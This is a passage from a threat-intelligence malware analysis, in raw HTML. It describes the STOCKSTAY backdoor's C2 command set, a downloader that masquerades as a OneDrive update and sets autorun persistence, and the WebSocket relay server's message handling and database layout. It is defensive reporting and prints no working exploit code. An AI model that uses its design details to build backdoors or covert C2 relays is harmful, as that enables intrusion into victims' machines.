&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Process multiple tasks at once.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a semi-colon-separated list of tasks, each of which must be a serialized JSON object containing an individual task.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Each task is submitted to the malware’s command-manager in-turn, with all command output being discarded; no data is returned to the C2 when processing multiple tasks at once.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Put&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Upload a file to the device.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a base64-encoded string representation of the file content to be written to the specified filepath. The required file write operation is performed in “Append” mode.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Confirmation of file upload, or details of any relevant error, is returned to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;RegDelete&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Delete a registry value.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a registry key and corresponding value name to delete.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;RegRead&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Read a registry value.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a registry key and corresponding value name to read.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;RegWrite&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Set a registry value. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a registry key and corresponding value name, as well as the value and data type used to populate the registry value. &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;RmDir&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Delete the specified directories.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a semi-colon-separated list of directory paths, each of which will be deleted. Confirmation of each deleted directory, or deletion failure, is returned to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Run&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Execute a new process.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a path to the file to execute and its corresponding arguments. A default timeout of 60 seconds is hard-coded into the malware, however this can be overridden by the task configuration.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;All subprocesses are created windowless with redirected stdout.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Sysinfo&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Conduct a system survey to gather key information about the infected host.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Operating system information is collected via the Windows Management Instrumentation (WMI) ManagementObjectSearcher, specifically the following fields:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;OSVersion&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Architecture&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;SerialNumber&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CodeSet&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CountryCode&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Locale&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;InstallDate&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;BootupTime&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MachineName&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;SystemDirectory&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;LocalTime&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AnsiCodePage&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UserName&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With respect to hardware, WMI is queried for the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ProcessorName&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;NumberCores&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ClockSpeed&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MemoryCapacity&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MemoryType&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;DiskModel &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;DiskSize&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The malware also captures a list of the names of running processes.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;UnpackArchive&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Extract the specified ZIP file to its current directory.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 1: Backdoor commands supported by STOCKSTAY.STOCKTRADER&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Related Downloaders and Installers&lt;/span&gt;&lt;/h4&gt;
&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.MARKETMAKER&lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.MARKETMAKER is a proxy-aware downloader written in .NET using the Windows Forms framework that downloads and extracts additional payloads from a remote server, establishes persistence through Windows registry modifications, and runs silently in the background with no user interface. This downloader has been observed masquerading as "MicrosoftUpdateOneDrive" to appear legitimate while setting up multiple autorun entries to execute the core components of STOCKSTAY.&lt;/span&gt;&lt;/p&gt;
&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;.NET AppDomainManager&lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;During our analysis, GTIG identified what we believe to be an early development sample of STOCKSTAY.MARKETMAKER which, instead of downloading the required components, was dependent on external mechanisms (such as &lt;/span&gt;&lt;a href="https://attack.mitre.org/techniques/T1574/014/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;.NET AppDomainManager injection&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;) for the initial deployment of samples to the target host.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY Server-Side Controller&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified a publicly accessible GitHub repository containing a Python implementation of the victim-facing STOCKSTAY WebSocket server controller. The lightweight design of the server component appears to supplement the threat actor’s usage of third-party hosting platforms such as &lt;/span&gt;&lt;a href="https://render.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Render&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; platform which provides a platform for hosting web services, including &lt;/span&gt;&lt;a href="https://render.com/docs/websocket" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebSockets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. The inability for the server to decrypt inbound messages prevents introspection by platform operators, and further obfuscates the location of the threat actor’s dedicated infrastructure. This architecture somewhat resembles Turla’s multi-hop KAZUAR C2 infrastructure.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Overview of STOCKSTAY C2 Infrastructure" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig4.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 4: Overview of STOCKSTAY C2 Infrastructure&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The server extends &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;tornado.websocket.WebSocketHandler&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to provide the interface described in Table 2, under the path &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;; aligning with all observed STOCKSTAY WebSocket C2 URLs.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Event&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Description&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.check_origin" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebSocketHandler.check_origin&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Hard-coded to return True to &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;accept all cross-origin traffic.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.open" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebSocketHandler.open&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Logs the client’s IP address using the following string format:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;WebSocket open. IP: {client_ip}&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.on_message" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebSocketHandler.on_message&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Handles inbound messages from the connected client.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Inbound messages are base64-decoded before being parsed as JSON into an object internally known as a “package”.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Each “package” contains an “action” and a “container”, which provide the request’s type and associated data, respectively. The following describes the handling logic of each action type.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Action: &lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;send&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The server extracts the following attributes from the inbound message’s “container” and inserts them into a new row within the local &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;weather_data&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; database table.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;container.target&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The STOCKSTAY client populates this field with the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;internal_id&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;i_id&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; field from the config file.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;container.sender&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The STOCKSTAY client populates this field with the unique client uuid generated on first execution.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;container.message&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This field contains the encrypted message body in a format referred to within the STOCKSTAY client as “CryptoContainer”. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On completion, the server logs the following message:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Action: send; trgt={target_id}; sndr={sender_id}&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Action: &lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;recv&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Inbound &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;recv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; requests simply specify the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;container.sender&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; attribute, which corresponds with the client’s unique identifier.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The server then retrieves all messages from the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;weather_data&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; database table where the target identifier (“degrees” column) matches the specified &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;container.sender&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. This has the effect of allowing the client to retrieve all messages intended for it, such as those sent to the server by an upstream C2 controller.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Each matching row is returned to the client in the following format, before being deleted from the database.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;{
	"target": degrees,
	"sender": pressure,
	"message": wdata,
	"ip": coords,
	"time": datetime
}&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On completion, the server logs the following message:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Action: recv; sndr={sender}&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.on_close" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebSocketHandler.on_close&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Logs the client’s IP address using the following string format:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;WebSocket close. IP: {client_ip}&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 2: Overview of STOCKSTAY WebSocket Server Interface&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Database Structure&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The server maintains a local SQLite3 database under the filename &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;weather_data1.db&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, structured as shown in Tables 3 and 4.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Column&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;id&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Primary key&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;degrees&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Recipient's UUID from &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;container.target&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;pressure&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Sender's UUID from &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;container.sender&lt;/code&gt;&lt;/p&gt;
